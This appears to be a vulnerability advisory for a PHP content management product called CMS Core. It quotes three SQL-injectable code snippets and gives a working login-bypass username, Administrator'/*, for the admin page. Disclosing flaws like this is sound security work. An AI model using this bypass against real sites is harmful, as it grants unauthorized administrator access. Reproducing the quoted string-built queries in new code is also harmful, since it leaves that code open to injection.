// GHC -> CMS CORE <- ADVISORY // Product: CMS Core // URL: http://chipmunk-scripts.com/scripts/cmscore.php // VULNERABILITY CLASS: SQL injection /*==========================================*/ [1] script name: index.php ---[code]--- $EntryID=$_GET['EntryID']; ... $article="SELECT * FROM CMS_articles where EntryID='$EntryID'"; ---[/code]--- Possible SQL injection http://CMScore/index.php?EntryID=[SQL code] [2] script name: index.php ---[code]--- $searchterm=$_POST[searchterm]; ... $newselect="Select * FROM CMS_articles where title LIKE %$searchterm% OR shortdescription LIKE %$searchterm% OR body LIKE %$searchterm% order by EntryID DESC LIMIT $start, $numentries"; ---[/code]--- Possible SQL injection through $searchterm variable in Search form. [3] script name: admin/authenticate.php ---[code]--- $username=$_POST['username']; $password=$_POST['password']; $password=md5($password); $query = "select * from CMS_logintable where username='$username' and password='$password'"; $result=mysql_query($query) or die("Could not Query"); ---[/code]--- Possible SQL injection through $username variable. [exploit] Log in with username Administrator'/* from admin/index.php page. [note] "Administrator" must be a valid user name. /* ================================================== */ /* www.ghc.ru -- security games & challenges */ /* ================================================== */ /* greets to: 1dt.w0lf & RST.void.ru, D0G4 */ /* & all quest hunters %) */ /* ================================================== */
